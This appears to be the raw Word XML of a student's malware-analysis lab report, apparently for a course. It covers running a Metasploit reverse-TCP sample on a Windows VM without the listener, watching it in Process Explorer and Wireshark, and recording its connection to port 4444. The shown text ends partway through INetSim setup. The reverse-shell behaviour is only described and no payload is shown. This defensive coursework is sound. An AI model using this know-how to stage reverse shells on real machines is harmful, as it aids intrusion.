    <w:p w14:paraId="23BE0288" w14:textId="4A985797" w:rsidR="005C6492" w:rsidRPr="005C6492" w:rsidRDefault="005C6492" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">lso, the malware program </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>terminate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the execution after some point, so it was a little bit tricky to see the live process using Process Explorer. Because it </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>terminate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in short amount of time, so I need to watch Process Explorer just after executing the program.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073429F9"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40" w14:textId="3DB56D4E" w:rsidR="00E7527C" w:rsidRDefault="00E7527C" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="742F2A4A" w14:textId="50765ABC" w:rsidR="009368A5" w:rsidRDefault="009368A5" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6783AFE4" w14:textId="77777777" w:rsidR="009368A5" w:rsidRPr="009368A5" w:rsidRDefault="009368A5" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00000041" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="0F38A9A9"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lastRenderedPageBreak/>
        <w:t>Part  4</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Run the Malware without Launching the Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000042"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In a real-world scenario, we won’t be able to launch the attack when needed, and we might need to analyze the Malware without an active attacker. We need to practice this now. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000043"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Stop Metasploit on your Kali VM, and try to analyze ‘test-malware’ again:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000044" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="00E7527C" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00000045"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1. Open your Windows VM, start Process Explorer, and double-click the Malware. What happens?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77964BB5"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46" w14:textId="3C059829" w:rsidR="00E7527C" w:rsidRDefault="005E29A2" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The process of the malware program showed up and almost after 10 seconds, </w:t>
      </w:r>
      <w:r w:rsidR="00782FD6">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r>
        <w:t>it terminated and gone</w:t>
      </w:r>
      <w:r w:rsidR="00782FD6">
        <w:t xml:space="preserve"> from the process list</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000047" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="00E7527C" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A7D9312"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48" w14:textId="12AD2665" w:rsidR="00E7527C" w:rsidRDefault="00E7527C" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00000049"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2. Open Wireshark, set it to capture ethernet traffic, and run the Malware again. What do you see? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C5302F"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4A" w14:textId="558EECB8" w:rsidR="00E7527C" w:rsidRDefault="008B3ED6" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The malware program tried to connect somewhere using TCP connection. But it failed to connect </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>cause</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> I didn’t execute the server program on Kali. It tried to connect again and again because the property of TCP and </w:t>
      </w:r>
      <w:r w:rsidR="004A27D4">
        <w:t xml:space="preserve">several seconds </w:t>
      </w:r>
      <w:r>
        <w:t>after, it stopped.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20691529" w14:textId="0E3997C6" w:rsidR="00E7527C" w:rsidRDefault="00E7527C" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52803203" w14:textId="1B0B87F1" w:rsidR="008B3ED6" w:rsidRDefault="008B3ED6" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="246ADCC7" w14:textId="34F4D9AD" w:rsidR="008B3ED6" w:rsidRDefault="008B3ED6" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0125BC63" wp14:editId="666467F4">
            <wp:extent cx="5935980" cy="2956560"/>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167EE2DB"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4C" w14:textId="06B11ACB" w:rsidR="00E7527C" w:rsidRDefault="00E7527C" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0000004D"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As you may have noticed, the Malware process disappears before you can analyze it using Process Explorer. This happens because this Malware relies on a reverse TCP connection, in which the process tries to initiate a TCP channel between the victim and the attacker. However, without launching the Metasploit attack, there is no active attacker to communicate with, so the Malware fails to establish a TCP channel and the process is terminated. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000004E" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRPr="000E6F94" w:rsidRDefault="00E7527C" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0000004F"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Go back to the Wireshark </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>output, and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve"> find the Five-Tuple values. Write them below:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000050" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="00000000" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Protocol</w:t>
      </w:r>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>: TCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000051" w14:textId="294DC3C2" w:rsidR="00E7527C" w:rsidRDefault="0F38A9A9" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Local IP:</w:t>
      </w:r>
      <w:r w:rsidR="000E6F94">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.0.0.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000052" w14:textId="275B9FCD" w:rsidR="00E7527C" w:rsidRDefault="0F38A9A9" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Local port</w:t>
      </w:r>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="000E6F94">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve"> 49163</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000053" w14:textId="4D41E96B" w:rsidR="00E7527C" w:rsidRDefault="0F38A9A9" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Remote IP</w:t>
      </w:r>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="000E6F94">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000054" w14:textId="53CE382C" w:rsidR="00E7527C" w:rsidRDefault="0F38A9A9" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Remote port</w:t>
      </w:r>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="000E6F94">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000055" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="00E7527C" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00000056" w14:textId="41FFB69D" w:rsidR="00E7527C" w:rsidRDefault="00E7527C" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A0D7763" w14:textId="41A9B5FB" w:rsidR="009368A5" w:rsidRDefault="009368A5" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26B72DAF" w14:textId="5C6061B2" w:rsidR="009368A5" w:rsidRDefault="009368A5" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7890E2AC" w14:textId="77777777" w:rsidR="009368A5" w:rsidRPr="009368A5" w:rsidRDefault="009368A5" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00000057" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="00000000"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lastRenderedPageBreak/>
        <w:t>Part  5</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>INetSim</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="00000058"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We can bypass this problem by simulating a process that would act as our attacker by using </w:t>
      </w:r>
      <w:hyperlink r:id="rId13">
        <w:r w:rsidRPr="0F38A9A9">
          <w:rPr>
            <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>INetSim</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000059" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="0F38A9A9" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>INetSim</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a software suite for simulating common internet services in a lab environment. It is very helpful. We can easily configure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to simulate a set of functions such as a WEB server, a DNS server, which makes it very useful for testing, monitoring and analyzing the network behavior of unknown malware samples.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should be already installed in your Kali VM, so we only need to configure it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000005A" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="00E7527C" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0000005B" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="0F38A9A9" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>Create a new folder and name it ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>INetSimFolder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000005C" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="0F38A9A9" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>Navigate into this folder, and create another folder named ‘Studio5’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000005D" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="0F38A9A9" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>Navigate into Studio5, and run:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000005E" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="0F38A9A9" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">cp </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>inetsim</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>inetsim.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">  // copy the sample config file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000005F" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="0F38A9A9" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve"> cp -r /var/lib/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>inetsim</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">/ </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>data  /</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>/ copy the default data folders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000060" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="0F38A9A9" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve"> -R 777 data</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>// make data files executable</w:t>
